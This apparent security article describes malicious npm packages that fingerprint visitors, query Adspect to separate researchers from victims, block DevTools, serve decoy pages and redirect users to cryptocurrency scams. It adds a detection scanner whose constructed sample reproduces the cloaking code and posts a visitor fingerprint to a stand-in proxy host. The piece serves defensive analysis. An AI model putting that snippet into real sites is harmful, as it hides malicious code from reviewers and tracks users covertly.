How Attackers Use Adspect and Fingerprinting to Outsmart Security Defenses
Picture this: a developer innocently installs an npm package, unaware that it’s been weaponized to outsmart even the most vigilant security teams. Attackers are now hijacking legitimate cloud services like Adspect to dynamically filter and redirect website visitors, making it nearly impossible for researchers to catch them in the act. By leveraging Adspect’s real-time visitor classification, malicious npm packages can distinguish between security professionals and everyday users, serving up decoy content to the former and scam payloads to the latter (BleepingComputer).
This isn’t just a clever trick—it’s a sophisticated blend of advanced fingerprinting, automated execution, and anti-analysis cloaking. Attackers gather granular browser and environmental data, using it to build unique visitor fingerprints and evade detection. The result? Security tools and analysts are systematically blinded, while real victims are funneled into convincing cryptocurrency scams. The recent campaign involving npm packages like integrator-filescrypt2025 and applicationooks21 highlights just how far threat actors have come in blending into legitimate development workflows and abusing trusted cloud infrastructure (BleepingComputer).
Leveraging Adspect for Dynamic Visitor Classification
Attackers behind malicious npm packages have adopted the Adspect cloud-based service to dynamically classify website visitors and tailor their attack delivery accordingly. Adspect is marketed as a legitimate cloud solution for filtering unauthorized access, blocking bots, and ensuring only genuine users reach protected content. However, threat actors have repurposed this technology to distinguish between security researchers and potential victims in real time (BleepingComputer).
When a compromised web application loads a malicious npm package, the injected JavaScript code automatically collects detailed browser and environmental data. This data is sent to the Adspect API, which evaluates the information to determine whether the visitor is a likely researcher or a regular user. The API’s decision then dictates the next stage of the attack: researchers are shown benign decoy pages, while genuine victims are redirected to scam destinations, such as fake cryptocurrency CAPTCHA sites.
This dynamic visitor classification undermines traditional security monitoring and analysis. Security teams often rely on static indicators of compromise or behavioral analysis, but Adspect’s real-time filtering means that researchers and automated scanners are systematically excluded from the malicious payload, significantly reducing the likelihood of early detection or takedown.
Advanced Fingerprinting Techniques for Target Discrimination
The malicious npm packages employ comprehensive fingerprinting to maximize the accuracy of visitor classification. The injected scripts gather a wide array of data points from the user’s browser and environment, including:
- User agent string
- Host and hostname of the current page
- Referrer URL
- Full URI and query string
- Protocol in use
- Browser language and encoding
- Timestamp of the visit
- Accepted content types
This information is assembled into a unique fingerprint for each visitor and transmitted to a threat actor-controlled proxy, which then interacts with the Adspect API (BleepingComputer). The real IP address of the visitor is also forwarded, enabling geolocation and further profiling.
By leveraging such granular fingerprinting, attackers can distinguish between human victims and automated analysis tools, as well as identify telltale signs of researcher activity (such as unusual browser configurations or VPN endpoints). This enables highly selective targeting, reducing the risk of exposure and increasing the effectiveness of their campaigns.
Automated Execution and Cloaking Mechanisms
To ensure seamless operation and evade detection, the malicious code is wrapped in an Immediately Invoked Function Expression (IIFE), which executes as soon as the web page loads—requiring no user interaction. This automation is critical for maximizing the attack’s reach, as it guarantees that every page visit is evaluated and processed without delay (BleepingComputer).
Cloaking techniques are also embedded within the code to hinder manual analysis. The script actively blocks common researcher actions such as right-clicking, opening developer tools (F12, Ctrl+U, Ctrl+Shift+I), and even reloads the page if it detects that browser DevTools are open. These anti-analysis features make it significantly more challenging for security professionals to inspect the malicious behavior in a browser context, further protecting the attacker’s infrastructure from scrutiny.
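As an added example (not code from the article or from the npm packages it describes), the following heuristic scanner scores a JavaScript source file for the fingerprinting data points listed above and the IIFE, hotkey-blocking and DevTools-reload cloaking traits just described; rule weights, the threshold and both sample inputs are constructed assumptions:

```javascript
// Added example (not from the article or the npm packages it describes): a heuristic
// static scanner for JavaScript source that scores the cloaking and fingerprinting
// traits discussed above. Rule weights, thresholds and both samples are assumptions.
const FINGERPRINT_FIELDS = [            // data points listed in the article
  /navigator\.userAgent/, /location\.host(name)?/, /document\.referrer/,
  /location\.(href|search)/, /location\.protocol/, /navigator\.language/,
  /Date\.now\(\)|new Date\(\)/, /\bAccept\b/,
];
const CLOAKING_RULES = [
  { id: 'contextmenu-block', weight: 1, re: /['"]contextmenu['"]/ },
  { id: 'devtools-hotkeys',  weight: 2, re: /\b(keyCode\s*===?\s*123|key\s*===?\s*['"]F12['"]|ctrlKey\s*&&[^;]*shiftKey)/ },
  // common "is DevTools open?" heuristic (window size delta) followed by a forced reload
  { id: 'devtools-reload',   weight: 2, re: /outerWidth\s*-\s*(window\.)?innerWidth[\s\S]{0,200}location\.reload\(\)/ },
  { id: 'iife-wrapper',      weight: 1, re: /^\s*\(\s*(async\s+)?function\s*\([^)]*\)\s*\{[\s\S]*\}\s*\)\s*\(\s*\)\s*;?\s*$/ },
  { id: 'exfil-request',     weight: 1, re: /\b(fetch|XMLHttpRequest|sendBeacon)\b/ },
];

// Returns the cumulative score and the ids of the rules that fired.
function scanSource(src) {
  const hits = [];
  let score = 0;
  for (const rule of CLOAKING_RULES) {
    if (rule.re.test(src)) { hits.push(rule.id); score += rule.weight; }
  }
  const fields = FINGERPRINT_FIELDS.filter((re) => re.test(src)).length;
  if (fields >= 4) { hits.push(`fingerprint-fields:${fields}`); score += 2; }
  return { score, hits };
}

function isSuspicious(src, threshold = 5) {
  return scanSource(src).score >= threshold;
}

// Constructed sample mimicking the described behaviour; not real package code.
const SUSPICIOUS_SAMPLE = `(function () {
  document.addEventListener('contextmenu', (e) => e.preventDefault());
  document.addEventListener('keydown', (e) => {
    if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey && e.key === 'I')) e.preventDefault();
  });
  setInterval(() => { if (window.outerWidth - window.innerWidth > 160) location.reload(); }, 500);
  const fp = { ua: navigator.userAgent, host: location.hostname, ref: document.referrer,
               uri: location.href, proto: location.protocol, lang: navigator.language, ts: Date.now() };
  fetch('https://proxy.example/check', { method: 'POST', body: JSON.stringify(fp) });
})();`;

// Constructed benign sample: an ordinary analytics call that also sends the user agent.
const BENIGN_SAMPLE = `export function track(evt) {
  return fetch('/api/track', { method: 'POST', body: JSON.stringify({ evt, ua: navigator.userAgent }) });
}`;
```

The scanner is a triage aid for reviewing package contents, not a signature: a benign snippet that merely sends a user agent scores low, while the combination of several cloaking traits with a multi-field fingerprint pushes the score over the threshold.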
Decoy and Deceptive Content Delivery
A key component of the attack is the use of decoy content to mislead security analysts and automated scanners. If the Adspect API determines that a visitor is likely a researcher, the malicious code loads a fake but benign company site (e.g., a fabricated “Offlido” business page) instead of the actual scam content. This reduces suspicion and helps the malicious packages remain undetected in the npm ecosystem and on compromised websites (BleepingComputer).
For genuine victims, the attack flow is entirely different. After passing the Adspect classification, users are redirected to a cryptocurrency-branded CAPTCHA page (such as Ethereum or Solana), which is designed to appear legitimate. Completing the CAPTCHA triggers a deceptive sequence that opens a new tab with an Adspect-defined URL, effectively masking the true nature of the redirection and making it appear as a user-initiated action. This obfuscation is intended to bypass both browser security features and user suspicion.
Implications for Security Defenses and Detection
The integration of Adspect and sophisticated fingerprinting into malicious npm packages presents significant challenges for defenders. Traditional signature-based detection is rendered ineffective, as the malicious payload is only delivered to carefully selected targets. Automated sandbox analysis is similarly thwarted by the anti-analysis and cloaking measures, as well as the real-time visitor classification.
Furthermore, the use of a legitimate cloud service like Adspect complicates attribution and takedown efforts. Security teams must now contend with attackers who can rapidly adapt their filtering criteria and infrastructure, making it harder to block malicious traffic or identify compromised packages in the npm registry.
The scale of the threat is underscored by the number of malicious packages and the sophistication of their deployment. In the reported campaign, seven npm packages were published under the developer alias “dino_reborn” between September and November 2025, with six containing active malicious code. These packages—such as integrator-filescrypt2025, integrator-2829, and applicationooks21—were specifically engineered to exploit Adspect’s capabilities for targeted redirection and evasion (BleepingComputer).
The attackers’ ability to blend into legitimate web development workflows, combined with their use of advanced filtering and fingerprinting, signals a new level of operational security in the npm threat landscape. Security practitioners must therefore develop new detection strategies that account for dynamic content delivery, behavioral cloaking, and the abuse of third-party cloud services.
Evolving Threat Landscape and Defensive Considerations
The abuse of Adspect and fingerprinting in npm-based attacks illustrates a broader trend toward highly adaptive, context-aware malware distribution. By integrating cloud-based visitor filtering and comprehensive environmental profiling, attackers can selectively deliver payloads, minimize exposure, and evade both automated and manual analysis.
Defenders must adapt by employing advanced behavioral analytics, network traffic inspection, and proactive threat intelligence. For example, monitoring for anomalous outbound connections to Adspect or similar filtering services, combined with deeper inspection of npm package dependencies, can help identify suspicious activity. Additionally, security teams should consider implementing browser instrumentation and deception technologies to disrupt attacker fingerprinting and classification efforts.
The ongoing evolution of these techniques highlights the importance of continuous monitoring and rapid response within the software supply chain. As attackers refine their use of legitimate services and advanced evasion tactics, defenders must remain vigilant and innovative to protect users and infrastructure from increasingly sophisticated npm package threats (BleepingComputer).
Final Thoughts
The abuse of Adspect and fingerprinting in malicious npm packages marks a turning point in the software supply chain threat landscape. Attackers are no longer relying on brute force or simple obfuscation—they’re deploying context-aware, adaptive malware that can sidestep traditional detection with ease. For defenders, this means that static signatures and sandboxing are no longer enough. Instead, security teams must embrace behavioral analytics, network monitoring, and proactive threat intelligence to keep pace with these evolving tactics (BleepingComputer).
As attackers continue to exploit legitimate cloud services and refine their evasion techniques, the need for continuous monitoring and rapid response becomes even more critical. The recent npm campaign is a wake-up call: the future of cybersecurity defense lies in adaptability, collaboration, and a willingness to outthink—not just outgun—our adversaries.
References
- Malicious npm packages abuse Adspect redirects to evade security, 2025, BleepingComputer. https://www.bleepingcomputer.com/news/security/malicious-npm-packages-abuse-adspect-redirects-to-evade-security/